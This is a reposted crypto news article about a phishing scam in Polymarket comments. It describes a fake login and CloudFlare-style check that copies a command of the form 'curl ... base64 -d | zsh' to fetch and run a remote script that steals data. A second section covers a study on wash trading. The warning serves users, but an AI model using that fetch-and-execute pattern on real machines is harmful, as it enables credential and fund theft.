The post Polymarket users sound alarm over phishing links in private markets appeared on BitcoinEthereumNews.com. Polymarket is in the headlines again, this time because one of its senior traders with the moniker “25usdc,” sounded the alarm over a scheme that uses the platform’s comment section to prey on unsuspecting users.  This is happening at a crucial time for the Polymarket platform as it is getting ready to re-enter the U.S. market and is struggling to get ahead of rivals like Kalshi.  Screenshot of a typical message of a hacker redirecting Polymarket users to click on phishing links. Source: @25usdc via X/Twitter. Polymarket traders on high alert  According to 25usdc, hackers have been using the Polymarket comment section to run a scam, and so far, users have lost over $500,000. “They say: ‘Why are you not trading on Polymarket private markets? The odds are always much better on there!’” 25usdc wrote, before explaining how the whole scam works.  According to him, it all starts with them buying both Yes and No shares for a market from two separate accounts. This way, their comments are still there even when the “Holders” filter is enabled. After that, they post a URL to their site in an obfuscated form. The URL takes the unsuspecting user to a clean-looking page with a Polymarket logo and requests users’ login via email. Once the email is verified, a new window pops up asking the user to verify their activity, imitating CloudFlare.  However 25usdc says when you click “Copy”, a command that looks something like this “curl -kfsSL $(echo ‘ENCODED_STRING==’|base64 -d)|zsh” is copied instead and the first thing it does, if the user makes the mistake of pasting it into their terminal, is decode the base64-encoded string (a server URL), after which it fetches a script from that server and immediately executes it.  The script in question can contain anything, and there will… The post Polymarket users sound alarm over phishing links in private markets appeared on BitcoinEthereumNews.com. Polymarket is in the headlines again, this time because one of its senior traders with the moniker “25usdc,” sounded the alarm over a scheme that uses the platform’s comment section to prey on unsuspecting users.  This is happening at a crucial time for the Polymarket platform as it is getting ready to re-enter the U.S. market and is struggling to get ahead of rivals like Kalshi.  Screenshot of a typical message of a hacker redirecting Polymarket users to click on phishing links. Source: @25usdc via X/Twitter. Polymarket traders on high alert  According to 25usdc, hackers have been using the Polymarket comment section to run a scam, and so far, users have lost over $500,000. “They say: ‘Why are you not trading on Polymarket private markets? The odds are always much better on there!’” 25usdc wrote, before explaining how the whole scam works.  According to him, it all starts with them buying both Yes and No shares for a market from two separate accounts. This way, their comments are still there even when the “Holders” filter is enabled. After that, they post a URL to their site in an obfuscated form. The URL takes the unsuspecting user to a clean-looking page with a Polymarket logo and requests users’ login via email. Once the email is verified, a new window pops up asking the user to verify their activity, imitating CloudFlare.  However 25usdc says when you click “Copy”, a command that looks something like this “curl -kfsSL $(echo ‘ENCODED_STRING==’|base64 -d)|zsh” is copied instead and the first thing it does, if the user makes the mistake of pasting it into their terminal, is decode the base64-encoded string (a server URL), after which it fetches a script from that server and immediately executes it.  The script in question can contain anything, and there will…

Polymarket users sound alarm over phishing links in private markets

For feedback or concerns regarding this content, please contact us at crypto.news@mexc.com

Polymarket is in the headlines again, this time because one of its senior traders with the moniker “25usdc,” sounded the alarm over a scheme that uses the platform’s comment section to prey on unsuspecting users. 

This is happening at a crucial time for the Polymarket platform as it is getting ready to re-enter the U.S. market and is struggling to get ahead of rivals like Kalshi. 

Screenshot of a typical message of a hacker redirecting Polymarket users to click on phishing links. Source: @25usdc via X/Twitter.

Polymarket traders on high alert 

According to 25usdc, hackers have been using the Polymarket comment section to run a scam, and so far, users have lost over $500,000.

“They say: ‘Why are you not trading on Polymarket private markets? The odds are always much better on there!’” 25usdc wrote, before explaining how the whole scam works. 

According to him, it all starts with them buying both Yes and No shares for a market from two separate accounts. This way, their comments are still there even when the “Holders” filter is enabled. After that, they post a URL to their site in an obfuscated form.

The URL takes the unsuspecting user to a clean-looking page with a Polymarket logo and requests users’ login via email. Once the email is verified, a new window pops up asking the user to verify their activity, imitating CloudFlare. 

However 25usdc says when you click “Copy”, a command that looks something like this “curl -kfsSL $(echo ‘ENCODED_STRING==’|base64 -d)|zsh” is copied instead and the first thing it does, if the user makes the mistake of pasting it into their terminal, is decode the base64-encoded string (a server URL), after which it fetches a script from that server and immediately executes it. 

The script in question can contain anything, and there will reportedly be no pop-up warning, at which point the damage has been done, and the only remedy according to 25usdc, might be turning off the Wi-Fi. 

“In the end, they gather data, log everything on your system, and send a zip back to their server,” 25usdc wrote. “They then use this data to log into your accounts and steal your money.”

Other things he noticed were how carefully the group operates; for example, they cover their trails by switching wallets often, obfuscate at every step of the way, and even shut down the server that sends payloads and receives logged data when there is no active victim.

“I think the best way to address this is to allow trusted users to review comments or to introduce a downvote system that hides heavily downvoted posts,” 25usdc concluded while pointing out that the simple warning Polymarket currently displays won’t be enough. 

New study claims Polymarket’s volume is propped up by wash trading

As Cryptopolitan reported, a recently published study by Columbia University researchers claims the volume of activity on Polymarket has been significantly inflated by wash trading. 

The “artificial trading,” as the authors termed it, varied over time, but they say it accounted for an average of 25% of all buying and selling on Polymarket over the past three years. 

The paper has not undergone peer review but is already up on the open-access research platform SSRN and is being reviewed by Polymarket. 

To be clear, the authors do not outrightly accuse Polymarket itself for the wash trading. However, they have highlighted elements of the exchange’s crypto-based structure that make the claim plausible.  

They have also suggested that the company’s customers may have independently engaged in said wash trading in an attempt to improve their chances of gaining access to a proprietary digital token that the company’s founder, Shayne Coplan, has hinted at the possibility of launching as recently as October 8th. 

“I’m hopeful that Polymarket will welcome the analysis in our paper,” Yash Kanoria, a professor at Columbia University’s business school, and one of the paper’s four co-authors, said in an email. “Wash trading doesn’t add liquidity or information to the market, so it would seem valuable to distinguish authentic from inauthentic volume.”

If some of Polymarket’s volume is truly “fictitious,” the study claims it could alter the understanding of Polymarket’s relative strength in the industry and also undermine the current notion that prediction markets reflect the “wisdom of a larger crowd.”

“The potential for large-scale wash trading means that volume may be unreliable as a metric of authentic platform activity, especially in cryptocurrency-based exchanges which may not have proper safeguards,” the authors concluded.

The smartest crypto minds already read our newsletter. Want in? Join them.

Source: https://www.cryptopolitan.com/phishing-links-in-polymarket-private-markets/

Market Opportunity
READY Logo
READY Price(READY)
$0.008255
$0.008255$0.008255
-7.96%
USD
READY (READY) Live Price Chart
Disclaimer: The articles reposted on this site are sourced from public platforms and are provided for informational purposes only. They do not necessarily reflect the views of MEXC. All rights remain with the original authors. If you believe any content infringes on third-party rights, please contact crypto.news@mexc.com for removal. MEXC makes no guarantees regarding the accuracy, completeness, or timeliness of the content and is not responsible for any actions taken based on the information provided. The content does not constitute financial, legal, or other professional advice, nor should it be considered a recommendation or endorsement by MEXC.

You May Also Like

Is Putnam Global Technology A (PGTAX) a strong mutual fund pick right now?

Is Putnam Global Technology A (PGTAX) a strong mutual fund pick right now?

The post Is Putnam Global Technology A (PGTAX) a strong mutual fund pick right now? appeared on BitcoinEthereumNews.com. On the lookout for a Sector – Tech fund? Starting with Putnam Global Technology A (PGTAX – Free Report) should not be a possibility at this time. PGTAX possesses a Zacks Mutual Fund Rank of 4 (Sell), which is based on various forecasting factors like size, cost, and past performance. Objective We note that PGTAX is a Sector – Tech option, and this area is loaded with many options. Found in a wide number of industries such as semiconductors, software, internet, and networking, tech companies are everywhere. Thus, Sector – Tech mutual funds that invest in technology let investors own a stake in a notoriously volatile sector, but with a much more diversified approach. History of fund/manager Putnam Funds is based in Canton, MA, and is the manager of PGTAX. The Putnam Global Technology A made its debut in January of 2009 and PGTAX has managed to accumulate roughly $650.01 million in assets, as of the most recently available information. The fund is currently managed by Di Yao who has been in charge of the fund since December of 2012. Performance Obviously, what investors are looking for in these funds is strong performance relative to their peers. PGTAX has a 5-year annualized total return of 14.46%, and is in the middle third among its category peers. But if you are looking for a shorter time frame, it is also worth looking at its 3-year annualized total return of 27.02%, which places it in the middle third during this time-frame. It is important to note that the product’s returns may not reflect all its expenses. Any fees not reflected would lower the returns. Total returns do not reflect the fund’s [%] sale charge. If sales charges were included, total returns would have been lower. When looking at a fund’s performance, it…
Share
BitcoinEthereumNews2025/09/18 04:05
Top Bitcoin Gambling Sites for Secure Play

Top Bitcoin Gambling Sites for Secure Play

Cryptsy - Latest Cryptocurrency News and Predictions Cryptsy - Latest Cryptocurrency News and Predictions - Experts in Crypto Casinos Did you know that top-rated
Share
Cryptsy2026/03/18 07:34
Saylor Says Bitcoin Could Win Big If AI Destroys Traditional Moats

Saylor Says Bitcoin Could Win Big If AI Destroys Traditional Moats

Michael Saylor says Bitcoin could emerge as one of the biggest winners if artificial intelligence compresses corporate “terminal value” and forces markets to stop
Share
Bitcoinist2026/03/18 07:00